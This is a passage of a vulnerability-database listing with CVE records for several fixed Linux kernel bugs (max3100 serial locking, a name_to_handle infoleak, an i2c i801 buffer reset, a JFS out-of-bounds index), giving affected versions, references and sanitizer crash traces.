"lessThan": "2.6.30",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.4",
"versionStartIncluding": "2.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "2.6.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nserial: max3100: Lock port-\u003elock when calling uart_handle_cts_change()\n\nuart_handle_cts_change() has to be called with port lock taken,\nSince we run it in a separate work, the lock may not be taken at\nthe time of running. Make sure that it\u0027s taken by explicitly doing\nthat. Without it we got a splat:\n\n WARNING: CPU: 0 PID: 10 at drivers/tty/serial/serial_core.c:3491 uart_handle_cts_change+0xa6/0xb0\n ...\n Workqueue: max3100-0 max3100_work [max3100]\n RIP: 0010:uart_handle_cts_change+0xa6/0xb0\n ...\n max3100_handlerx+0xc5/0x110 [max3100]\n max3100_work+0x12a/0x340 [max3100]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:15:46.722Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/44b38924135d2093e2ec1812969464845dd66dc9"
},
{
"url": "https://git.kernel.org/stable/c/ea9b35372b58ac2931bfc1d5bc25e839d1221e30"
},
{
"url": "https://git.kernel.org/stable/c/cc121e3722a0a2c8f716ef991e5425b180a5fb94"
},
{
"url": "https://git.kernel.org/stable/c/78dbda51bb4241b88a52d71620f06231a341f9ba"
},
{
"url": "https://git.kernel.org/stable/c/8296bb9e5925b6634259c5d4daee88f0cc0884ec"
},
{
"url": "https://git.kernel.org/stable/c/93df2fba6c7dfa9a2f08546ea9a5ca4728758458"
},
{
"url": "https://git.kernel.org/stable/c/865b30c8661924ee9145f442bf32cea549faa869"
},
{
"url": "https://git.kernel.org/stable/c/77ab53371a2066fdf9b895246505f5ef5a4b5d47"
}
],
"title": "serial: max3100: Lock port-\u003elock when calling uart_handle_cts_change()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38634",
"datePublished": "2024-06-21T10:18:23.573Z",
"dateReserved": "2024-06-18T19:36:34.947Z",
"dateUpdated": "2025-11-04T17:21:53.204Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26901 (GCVE-0-2024-26901)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 08:59
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
do_sys_name_to_handle(): use kzalloc() to fix kernel-infoleak
syzbot identified a kernel information leak vulnerability in
do_sys_name_to_handle() and issued the following report [1].
[1]
"BUG: KMSAN: kernel-infoleak in instrument_copy_to_user include/linux/instrumented.h:114 [inline]
BUG: KMSAN: kernel-infoleak in _copy_to_user+0xbc/0x100 lib/usercopy.c:40
instrument_copy_to_user include/linux/instrumented.h:114 [inline]
_copy_to_user+0xbc/0x100 lib/usercopy.c:40
copy_to_user include/linux/uaccess.h:191 [inline]
do_sys_name_to_handle fs/fhandle.c:73 [inline]
__do_sys_name_to_handle_at fs/fhandle.c:112 [inline]
__se_sys_name_to_handle_at+0x949/0xb10 fs/fhandle.c:94
__x64_sys_name_to_handle_at+0xe4/0x140 fs/fhandle.c:94
...
Uninit was created at:
slab_post_alloc_hook+0x129/0xa70 mm/slab.h:768
slab_alloc_node mm/slub.c:3478 [inline]
__kmem_cache_alloc_node+0x5c9/0x970 mm/slub.c:3517
__do_kmalloc_node mm/slab_common.c:1006 [inline]
__kmalloc+0x121/0x3c0 mm/slab_common.c:1020
kmalloc include/linux/slab.h:604 [inline]
do_sys_name_to_handle fs/fhandle.c:39 [inline]
__do_sys_name_to_handle_at fs/fhandle.c:112 [inline]
__se_sys_name_to_handle_at+0x441/0xb10 fs/fhandle.c:94
__x64_sys_name_to_handle_at+0xe4/0x140 fs/fhandle.c:94
...
Bytes 18-19 of 20 are uninitialized
Memory access of size 20 starts at ffff888128a46380
Data copied to user address 0000000020000240"
Per Chuck Lever's suggestion, use kzalloc() instead of kmalloc() to
solve the problem.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 990d6c2d7aee921e3bce22b2d6a750fd552262be Version: 990d6c2d7aee921e3bce22b2d6a750fd552262be Version: 990d6c2d7aee921e3bce22b2d6a750fd552262be Version: 990d6c2d7aee921e3bce22b2d6a750fd552262be Version: 990d6c2d7aee921e3bce22b2d6a750fd552262be Version: 990d6c2d7aee921e3bce22b2d6a750fd552262be Version: 990d6c2d7aee921e3bce22b2d6a750fd552262be Version: 990d6c2d7aee921e3bce22b2d6a750fd552262be Version: 990d6c2d7aee921e3bce22b2d6a750fd552262be |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26901",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-16T15:11:22.418196Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-07T19:03:33.420Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.665Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4bac28f441e3cc9d3f1a84c8d023228a68d8a7c1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/772a7def9868091da3bcb0d6c6ff9f0c03d7fa8b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cde76b3af247f615447bcfecf610bb76c3529126"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/423b6bdf19bbc5e1f7e7461045099917378f7e71"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e6450d5e46a737a008b4885aa223486113bf0ad6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c1362eae861db28b1608b9dc23e49634fe87b63b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cba138f1ef37ec6f961baeab62f312dedc7cf730"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bf9ec1b24ab4e94345aa1c60811dd329f069c38b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3948abaa4e2be938ccdfc289385a27342fb13d43"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/fhandle.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4bac28f441e3cc9d3f1a84c8d023228a68d8a7c1",
"status": "affected",
"version": "990d6c2d7aee921e3bce22b2d6a750fd552262be",
"versionType": "git"
},
{
"lessThan": "772a7def9868091da3bcb0d6c6ff9f0c03d7fa8b",
"status": "affected",
"version": "990d6c2d7aee921e3bce22b2d6a750fd552262be",
"versionType": "git"
},
{
"lessThan": "cde76b3af247f615447bcfecf610bb76c3529126",
"status": "affected",
"version": "990d6c2d7aee921e3bce22b2d6a750fd552262be",
"versionType": "git"
},
{
"lessThan": "423b6bdf19bbc5e1f7e7461045099917378f7e71",
"status": "affected",
"version": "990d6c2d7aee921e3bce22b2d6a750fd552262be",
"versionType": "git"
},
{
"lessThan": "e6450d5e46a737a008b4885aa223486113bf0ad6",
"status": "affected",
"version": "990d6c2d7aee921e3bce22b2d6a750fd552262be",
"versionType": "git"
},
{
"lessThan": "c1362eae861db28b1608b9dc23e49634fe87b63b",
"status": "affected",
"version": "990d6c2d7aee921e3bce22b2d6a750fd552262be",
"versionType": "git"
},
{
"lessThan": "cba138f1ef37ec6f961baeab62f312dedc7cf730",
"status": "affected",
"version": "990d6c2d7aee921e3bce22b2d6a750fd552262be",
"versionType": "git"
},
{
"lessThan": "bf9ec1b24ab4e94345aa1c60811dd329f069c38b",
"status": "affected",
"version": "990d6c2d7aee921e3bce22b2d6a750fd552262be",
"versionType": "git"
},
{
"lessThan": "3948abaa4e2be938ccdfc289385a27342fb13d43",
"status": "affected",
"version": "990d6c2d7aee921e3bce22b2d6a750fd552262be",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/fhandle.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.39"
},
{
"lessThan": "2.6.39",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "2.6.39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "2.6.39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "2.6.39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "2.6.39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "2.6.39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "2.6.39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "2.6.39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "2.6.39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.39",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndo_sys_name_to_handle(): use kzalloc() to fix kernel-infoleak\n\nsyzbot identified a kernel information leak vulnerability in\ndo_sys_name_to_handle() and issued the following report [1].\n\n[1]\n\"BUG: KMSAN: kernel-infoleak in instrument_copy_to_user include/linux/instrumented.h:114 [inline]\nBUG: KMSAN: kernel-infoleak in _copy_to_user+0xbc/0x100 lib/usercopy.c:40\n instrument_copy_to_user include/linux/instrumented.h:114 [inline]\n _copy_to_user+0xbc/0x100 lib/usercopy.c:40\n copy_to_user include/linux/uaccess.h:191 [inline]\n do_sys_name_to_handle fs/fhandle.c:73 [inline]\n __do_sys_name_to_handle_at fs/fhandle.c:112 [inline]\n __se_sys_name_to_handle_at+0x949/0xb10 fs/fhandle.c:94\n __x64_sys_name_to_handle_at+0xe4/0x140 fs/fhandle.c:94\n ...\n\nUninit was created at:\n slab_post_alloc_hook+0x129/0xa70 mm/slab.h:768\n slab_alloc_node mm/slub.c:3478 [inline]\n __kmem_cache_alloc_node+0x5c9/0x970 mm/slub.c:3517\n __do_kmalloc_node mm/slab_common.c:1006 [inline]\n __kmalloc+0x121/0x3c0 mm/slab_common.c:1020\n kmalloc include/linux/slab.h:604 [inline]\n do_sys_name_to_handle fs/fhandle.c:39 [inline]\n __do_sys_name_to_handle_at fs/fhandle.c:112 [inline]\n __se_sys_name_to_handle_at+0x441/0xb10 fs/fhandle.c:94\n __x64_sys_name_to_handle_at+0xe4/0x140 fs/fhandle.c:94\n ...\n\nBytes 18-19 of 20 are uninitialized\nMemory access of size 20 starts at ffff888128a46380\nData copied to user address 0000000020000240\"\n\nPer Chuck Lever\u0027s suggestion, use kzalloc() instead of kmalloc() to\nsolve the problem."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:59:15.310Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4bac28f441e3cc9d3f1a84c8d023228a68d8a7c1"
},
{
"url": "https://git.kernel.org/stable/c/772a7def9868091da3bcb0d6c6ff9f0c03d7fa8b"
},
{
"url": "https://git.kernel.org/stable/c/cde76b3af247f615447bcfecf610bb76c3529126"
},
{
"url": "https://git.kernel.org/stable/c/423b6bdf19bbc5e1f7e7461045099917378f7e71"
},
{
"url": "https://git.kernel.org/stable/c/e6450d5e46a737a008b4885aa223486113bf0ad6"
},
{
"url": "https://git.kernel.org/stable/c/c1362eae861db28b1608b9dc23e49634fe87b63b"
},
{
"url": "https://git.kernel.org/stable/c/cba138f1ef37ec6f961baeab62f312dedc7cf730"
},
{
"url": "https://git.kernel.org/stable/c/bf9ec1b24ab4e94345aa1c60811dd329f069c38b"
},
{
"url": "https://git.kernel.org/stable/c/3948abaa4e2be938ccdfc289385a27342fb13d43"
}
],
"title": "do_sys_name_to_handle(): use kzalloc() to fix kernel-infoleak",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26901",
"datePublished": "2024-04-17T10:27:50.374Z",
"dateReserved": "2024-02-19T14:20:24.187Z",
"dateUpdated": "2025-05-04T08:59:15.310Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26593 (GCVE-0-2024-26593)
Vulnerability from cvelistv5
Published
2024-02-23 09:09
Modified
2025-11-04 18:29
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
i2c: i801: Fix block process call transactions
According to the Intel datasheets, software must reset the block
buffer index twice for block process call transactions: once before
writing the outgoing data to the buffer, and once again before
reading the incoming data from the buffer.
The driver is currently missing the second reset, causing the wrong
portion of the block buffer to be read.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 315cd67c945351f8a569500f8ab16b7fa94026e8 Version: 315cd67c945351f8a569500f8ab16b7fa94026e8 Version: 315cd67c945351f8a569500f8ab16b7fa94026e8 Version: 315cd67c945351f8a569500f8ab16b7fa94026e8 Version: 315cd67c945351f8a569500f8ab16b7fa94026e8 Version: 315cd67c945351f8a569500f8ab16b7fa94026e8 Version: 315cd67c945351f8a569500f8ab16b7fa94026e8 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26593",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-23T18:10:30.612535Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:57.776Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T18:29:49.967Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d074d5ff5ae77b18300e5079c6bda6342a4d44b7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7a14b8a477b88607d157c24aeb23e7389ec3319f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1f8d0691c50581ba6043f009ec9e8b9f78f09d5a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/491528935c9c48bf341d8b40eabc6c4fc5df6f2c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6be99c51829b24c914cef5bff6164877178e84d9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/609c7c1cc976e740d0fed4dbeec688b3ecb5dce2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c1c9d0f6f7f1dbf29db996bd8e166242843a5f21"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZOU3745CWCDZ7EMKMXB2OEEIB5Q3IWM/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/i2c/busses/i2c-i801.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d074d5ff5ae77b18300e5079c6bda6342a4d44b7",
"status": "affected",
"version": "315cd67c945351f8a569500f8ab16b7fa94026e8",
"versionType": "git"
},
{
"lessThan": "7a14b8a477b88607d157c24aeb23e7389ec3319f",
"status": "affected",
"version": "315cd67c945351f8a569500f8ab16b7fa94026e8",
"versionType": "git"
},
{
"lessThan": "1f8d0691c50581ba6043f009ec9e8b9f78f09d5a",
"status": "affected",
"version": "315cd67c945351f8a569500f8ab16b7fa94026e8",
"versionType": "git"
},
{
"lessThan": "491528935c9c48bf341d8b40eabc6c4fc5df6f2c",
"status": "affected",
"version": "315cd67c945351f8a569500f8ab16b7fa94026e8",
"versionType": "git"
},
{
"lessThan": "6be99c51829b24c914cef5bff6164877178e84d9",
"status": "affected",
"version": "315cd67c945351f8a569500f8ab16b7fa94026e8",
"versionType": "git"
},
{
"lessThan": "609c7c1cc976e740d0fed4dbeec688b3ecb5dce2",
"status": "affected",
"version": "315cd67c945351f8a569500f8ab16b7fa94026e8",
"versionType": "git"
},
{
"lessThan": "c1c9d0f6f7f1dbf29db996bd8e166242843a5f21",
"status": "affected",
"version": "315cd67c945351f8a569500f8ab16b7fa94026e8",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/i2c/busses/i2c-i801.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.3"
},
{
"lessThan": "5.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ni2c: i801: Fix block process call transactions\n\nAccording to the Intel datasheets, software must reset the block\nbuffer index twice for block process call transactions: once before\nwriting the outgoing data to the buffer, and once again before\nreading the incoming data from the buffer.\n\nThe driver is currently missing the second reset, causing the wrong\nportion of the block buffer to be read."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:51:47.994Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d074d5ff5ae77b18300e5079c6bda6342a4d44b7"
},
{
"url": "https://git.kernel.org/stable/c/7a14b8a477b88607d157c24aeb23e7389ec3319f"
},
{
"url": "https://git.kernel.org/stable/c/1f8d0691c50581ba6043f009ec9e8b9f78f09d5a"
},
{
"url": "https://git.kernel.org/stable/c/491528935c9c48bf341d8b40eabc6c4fc5df6f2c"
},
{
"url": "https://git.kernel.org/stable/c/6be99c51829b24c914cef5bff6164877178e84d9"
},
{
"url": "https://git.kernel.org/stable/c/609c7c1cc976e740d0fed4dbeec688b3ecb5dce2"
},
{
"url": "https://git.kernel.org/stable/c/c1c9d0f6f7f1dbf29db996bd8e166242843a5f21"
}
],
"title": "i2c: i801: Fix block process call transactions",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26593",
"datePublished": "2024-02-23T09:09:10.021Z",
"dateReserved": "2024-02-19T14:20:24.127Z",
"dateUpdated": "2025-11-04T18:29:49.967Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-52603 (GCVE-0-2023-52603)
Vulnerability from cvelistv5
Published
2024-03-06 06:45
Modified
2025-05-04 07:39
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
UBSAN: array-index-out-of-bounds in dtSplitRoot
Syzkaller reported the following issue:
oop0: detected capacity change from 0 to 32768
UBSAN: array-index-out-of-bounds in fs/jfs/jfs_dtree.c:1971:9
index -2 is out of range for type 'struct dtslot [128]'
CPU: 0 PID: 3613 Comm: syz-executor270 Not tainted 6.0.0-syzkaller-09423-g493ffd6605b2 #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/22/2022
Call Trace:
<TASK>
__dump_stack lib/dump_stack.c:88 [inline]
dump_stack_lvl+0x1b1/0x28e lib/dump_stack.c:106
ubsan_epilogue lib/ubsan.c:151 [inline]
__ubsan_handle_out_of_bounds+0xdb/0x130 lib/ubsan.c:283
dtSplitRoot+0x8d8/0x1900 fs/jfs/jfs_dtree.c:1971
dtSplitUp fs/jfs/jfs_dtree.c:985 [inline]
dtInsert+0x1189/0x6b80 fs/jfs/jfs_dtree.c:863
jfs_mkdir+0x757/0xb00 fs/jfs/namei.c:270
vfs_mkdir+0x3b3/0x590 fs/namei.c:4013
do_mkdirat+0x279/0x550 fs/namei.c:4038
__do_sys_mkdirat fs/namei.c:4053 [inline]
__se_sys_mkdirat fs/namei.c:4051 [inline]
__x64_sys_mkdirat+0x85/0x90 fs/namei.c:4051
do_syscall_x64 arch/x86/entry/common.c:50 [inline]
do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80
entry_SYSCALL_64_after_hwframe+0x63/0xcd
RIP: 0033:0x7fcdc0113fd9
Code: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 c0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffeb8bc67d8 EFLAGS: 00000246 ORIG_RAX: 0000000000000102
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fcdc0113fd9
RDX: 0000000000000000 RSI: 0000000020000340 RDI: 0000000000000003
RBP: 00007fcdc00d37a0 R08: 0000000000000000 R09: 00007fcdc00d37a0
